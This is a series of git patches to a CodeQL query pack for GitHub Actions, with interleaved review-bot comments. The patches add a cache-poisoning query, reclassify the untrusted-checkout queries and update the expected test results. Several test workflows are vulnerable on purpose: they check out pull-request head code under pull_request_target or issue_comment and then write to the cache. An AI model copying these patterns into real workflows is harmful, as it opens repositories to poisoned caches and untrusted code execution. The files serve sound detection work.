@@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | 
@@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | 
@@ -43,8 +43,8 @@ subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref deleted file mode 100644 index b0c41e712e5..00000000000 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-829/UntrustedCheckout.ql diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected new file mode 100644 index 00000000000..ff65e165812 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected @@ -0,0 +1,6 @@ +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref new file mode 100644 index 00000000000..1192fcfe616 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutError.ql 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected similarity index 79% rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected index 4913ed2d100..628234f7e8b 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected @@ -1,6 +1,4 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | 
@@ -18,10 +16,6 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref new file mode 100644 index 00000000000..8c77a95b48c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutWarning.ql From addedd0e2aa26f630e766ad00b589ff19fd484e9 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 4 May 2024 23:29:55 +0200 Subject: [PATCH 0230/1267] Comment out unused source --- .../codeql/actions/dataflow/FlowSources.qll | 33 +++++++++---------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 6dd9b5d3617..a97dc8405f4 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,23 +76,22 @@ private predicate textEvent(string context) { ) } -bindingset[context] -private predicate repoNameEvent(string context) { - exists(string reg | - reg = - [ - // repo name - // Owner: All characters must be either a hyphen (-) or alphanumeric - // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name - "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name - "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo - ] - | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} - +// bindingset[context] +// private predicate repoNameEvent(string context) { +// exists(string reg | +// reg = +// [ +// // repo name +// // Owner: All characters must be either a hyphen (-) or alphanumeric +// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point +// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name +// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name +// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo +// ] +// | +// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) +// ) +// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | 
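Review bot: `repoNameEvent` stays in FlowSources.qll as a commented-out block, and nothing in the file says why it is kept. Either delete the predicate (git history preserves it) or put one line above the block, e.g. `// repoNameEvent is currently unused by any source; kept for reference, see the character restrictions below`. The rewritten block also drops the blank line that separated it from `bindingset[context]` of `branchEvent`, so the dead code runs straight into the next predicate. `branchEvent` continues outside the hunk.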
From bb028e41d49899955ebf3e834f4bd126b4a35763 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:10:34 +0200 Subject: [PATCH 0231/1267] Add Cache Poisoning Query --- .../actions/security/CachePoisoningQuery.qll | 55 +++++++++++++++++++ ql/src/Security/CWE-349/CachePoisoning.ql | 36 ++++++++++++ .../CWE-349/.github/workflows/test1.yml | 22 ++++++++ .../CWE-349/.github/workflows/test2.yml | 17 ++++++ .../CWE-349/.github/workflows/test3.yml | 21 +++++++ .../CWE-349/.github/workflows/test4.yml | 17 ++++++ .../Security/CWE-349/CachePoisoning.expected | 3 + .../Security/CWE-349/CachePoisoning.qlref | 2 + 8 files changed, 173 insertions(+) create mode 100644 ql/lib/codeql/actions/security/CachePoisoningQuery.qll create mode 100644 ql/src/Security/CWE-349/CachePoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll new file mode 100644 index 00000000000..a9a28227957 --- /dev/null +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll 
@@ -0,0 +1,55 @@
+import actions
+
+abstract class CacheWritingStep extends Step { }
+
+class CacheActionUsesStep extends CacheWritingStep, UsesStep {
+ CacheActionUsesStep() { this.getCallee() = "actions/cache" }
+}
+
+class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep {
+ CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" }
+}
+
+class SetupJavaUsesStep extends CacheWritingStep, UsesStep {
+ SetupJavaUsesStep() {
+ this.getCallee() = "actions/setup-java" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
+
+class SetupGoUsesStep extends CacheWritingStep, UsesStep {
+ SetupGoUsesStep() { this.getCallee() = "actions/setup-go" }
+}
+
+class SetupNodeUsesStep extends CacheWritingStep, UsesStep {
+ SetupNodeUsesStep() {
+ this.getCallee() = "actions/setup-node" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
+
+class SetupPythonUsesStep extends CacheWritingStep, UsesStep {
+ SetupPythonUsesStep() {
+ this.getCallee() = "actions/setup-python" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
+
+class SetupDotnetUsesStep extends CacheWritingStep, UsesStep {
+ SetupDotnetUsesStep() {
+ this.getCallee() = "actions/setup-dotnet" and
+ (
+ exists(this.getArgument("cache")) or
+ exists(this.getArgument("cache-dependency-path"))
+ )
+ }
+}
diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql
new file mode 100644
index 00000000000..b3a9267703f
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoning.ql
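Review bot: None of the classes added in CachePoisoningQuery.qll has QLDoc, so nothing states what makes a step count as a `CacheWritingStep`. I would add `/** A step that may write to the GitHub Actions cache. */` on the abstract class and one line per subclass naming the inputs it treats as enabling caching. The Java, Node, Python and Dotnet classes repeat the same `cache` / `cache-dependency-path` test, while `SetupGoUsesStep` matches every `actions/setup-go` step with no input check. The doc should say whether that difference is intended, because it decides which jobs the cache-poisoning query reports.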
@@ -0,0 +1,36 @@
+/**
+ * @name Cache Poisoning
+ * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/cache-poisoning
+ * @tags actions
+ * security
+ * external/cwe/cwe-349
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.CachePoisoningQuery
+
+from Workflow w, PRHeadCheckoutStep checkout, LocalJob j
+where
+ // TODO: (require to collect trigger types)
+ // - add push to default branch?
+ // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch
+ w.hasTriggerEvent([
+ "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum",
+ "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column",
+ "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule",
+ "watch", "workflow_run"
+ ]) and
+ // Workflow is privileged
+ w.isPrivileged() and
+ // The workflow checkouts untrusted code from a pull request
+ j = w.getAJob() and
+ j.getAStep() = checkout and
+ // The checkout step is followed by a cache writing step
+ j.getAStep() instanceof CacheWritingStep
+select checkout, "Potential cache poisoning on privileged workflow."
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml
new file mode 100644
index 00000000000..75e03886d48
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml
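Review bot: The comment `// The checkout step is followed by a cache writing step` in CachePoisoning.ql does not match the condition under it. `j.getAStep() instanceof CacheWritingStep` holds for any cache-writing step in the job, including one that runs before the checkout. If step order is deliberately ignored, reword it to `// The job also contains a step that writes to the cache (step order is not checked)`; if order matters, the condition has to relate the two steps. The `@description` is circular ("can be poisoned ... leading to a cache poisoning attack") and would read better if it named the condition the query detects: untrusted pull request code checked out in a job that writes to the cache.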
@@ -0,0 +1,22 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml new file mode 100644 index 00000000000..6a6595d929e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml @@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/cache@v2 + with: + path: ./poison + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml new file mode 100644 index 00000000000..2c684b6a02d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml @@ -0,0 +1,21 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-java@v2 + with: + distribution: 'zulu' + java-version: '21' + cache: 'gradle' + cache-dependency-path: | + sub-project/*.gradle* + sub-project/**/gradle-wrapper.properties + - run: | + java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml new file mode 100644 index 00000000000..b5ea127ebd3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml 
@@ -0,0 +1,17 @@ +name: Cache Poisoning + +on: pull_request_target + +jobs: + poison: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/setup-java@v2 + with: + distribution: 'zulu' + java-version: '21' + - run: | + java HelloWorldApp.java diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected new file mode 100644 index 00000000000..e767e2f8622 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref new file mode 100644 index 00000000000..2cbd05800e6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoning.ql + From 9417e1d164835cf59d9bcb6b73466e43ec58112e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 6 May 2024 17:13:00 +0200 Subject: [PATCH 0232/1267] Classify checkout steps --- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../security/UntrustedCheckoutQuery.qll | 23 +++++++--- ql/src/Security/CWE-829/UnpinnedActionsTag.md | 44 ------------------- .../CWE-829/UntrustedCheckoutError.md | 0 .../CWE-829/UntrustedCheckoutWarning.md | 0 5 files changed, 19 insertions(+), 52 deletions(-) delete mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.md delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index a97dc8405f4..580fb1d25ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -113,8 +113,8 @@ private predicate branchEvent(string context) { "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -146,6 +146,7 @@ private predicate emailEvent(string context) { "github\\.event\\.head_commit\\.committer\\.email", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] @@ -165,6 +166,7 @@ private predicate usernameEvent(string context) { "github\\.event\\.head_commit\\.committer\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index c677915f504..10a45830324 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
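Review bot: The `merge_group` entries added to `emailEvent` and `usernameEvent` (hunks at -146 and -165) use the paths `github.event.merge_group.committer.email` and `github.event.merge_group.committer.name`, with no `head_commit` segment and no `author` counterpart. Every neighbouring entry pairs author and committer under `head_commit` or `commits[n]`, and this same commit adds `github.event.merge_group.head_commit.id` to `containsHeadSHA`, which suggests the commit object sits under `merge_group.head_commit`. If that is the payload shape, the two new regexes never match and merge-queue commit metadata is not treated as an untrusted source. Please confirm against the merge_group payload and, if so, use `"github\\.event\\.merge_group\\.head_commit\\.committer\\.email"` plus the matching `author` and `name` entries. The predicate bodies continue outside these hunks.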
@@ -40,6 +40,8 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.head_sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_sha\\b", + "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" ], _, _) @@ -56,6 +58,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars @@ -64,11 +67,17 @@ predicate containsHeadRef(string s) { ) } -/** Checkout of a Pull Request HEAD ref */ +/** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { } +/** Checkout of a Pull Request HEAD ref */ +abstract class MutableRefCheckoutStep extends PRHeadCheckoutStep { } + +/** Checkout of a Pull Request HEAD ref */ +abstract class SHACheckoutStep extends PRHeadCheckoutStep { } + /** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { +class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( 
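Review bot: The two new abstract classes in the -64 hunk share one QLDoc line, `/** Checkout of a Pull Request HEAD ref */`, so `SHACheckoutStep` is documented as a ref checkout. The names suggest the split is between a movable ref and a fixed commit, and the comments should carry that: `/** Checkout of a Pull Request HEAD through a mutable ref (e.g. a branch name) */` on `MutableRefCheckoutStep` and `/** Checkout of a Pull Request HEAD pinned to a commit SHA */` on `SHACheckoutStep`. The same "HEAD ref" wording remains on `ActionsSHACheckout`, `GitSHACheckout` and `GhSHACheckout` in the hunks that follow. The body of `ActionsMutableRefCheckout` continues outside the hunk.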
@@ -102,7 +111,7 @@ class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep { } /** Checkout of a Pull Request HEAD ref using actions/checkout action */ -class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { +class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and ( @@ -132,7 +141,7 @@ class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep { } /** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { +class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -154,7 +163,7 @@ class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using git within a Run step */ -class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { +class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -173,7 +182,7 @@ class GitSHACheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { +class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string line | this.getScript().splitAt("\n") = line and @@ -194,7 +203,7 @@ class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run { } /** Checkout of a Pull Request HEAD ref using gh within a Run step */ -class GhSHACheckout extends PRHeadCheckoutStep instanceof Run { +class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string line | this.getScript().splitAt("\n") = line and 
